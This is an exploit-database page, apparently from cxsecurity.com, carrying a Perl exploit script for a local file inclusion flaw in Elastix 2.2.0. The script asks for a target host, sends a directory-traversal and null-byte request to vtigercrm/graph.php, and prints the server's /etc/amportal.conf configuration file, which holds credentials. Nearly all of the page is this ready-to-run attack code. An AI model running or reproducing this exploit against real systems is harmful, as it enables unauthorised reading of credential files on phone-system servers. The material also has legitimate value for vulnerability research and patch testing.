Elastix 2.2.0 Local File Inclusion

2012.08.18
Credit: cheki
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

#!/usr/bin/perl -w #------------------------------------------------------------------------------------# #Elastix is an Open Source Sofware to establish Unified Communications. #About this concept, Elastix goal is to incorporate all the communication alternatives, #available at an enterprise level, into a unique solution. #------------------------------------------------------------------------------------# ############################################################ # Exploit Title: Elastix 2.2.0 LFI # Google Dork: :( # Author: cheki # Version:Elastix 2.2.0 # Tested on: multiple # CVE : notyet # romanc-_-eyes ;) # Discovered by romanc-_-eyes # vendor http://www.elastix.org/ print "\t Elastix 2.2.0 LFI Exploit \n"; print "\t code author cheki \n"; print "\t 0day Elastix 2.2.0 \n"; print "\t email: anonymous17hacker{}gmail.com \n"; #LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action use LWP::UserAgent; print "\n Target: https://ip "; chomp(my $target=<STDIN>); $dir="vtigercrm"; $poc="current_language"; $etc="etc"; $jump="../../../../../../../..//"; $test="amportal.conf%00"; $code = LWP::UserAgent->new() or die "inicializacia brauzeris\n"; $code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action"; $res = $code->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ 'This file is part of FreePBX') { print "\n read amportal.conf file : $answer \n\n"; print " successful read\n"; } else { print "\n[-] not successful\n"; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top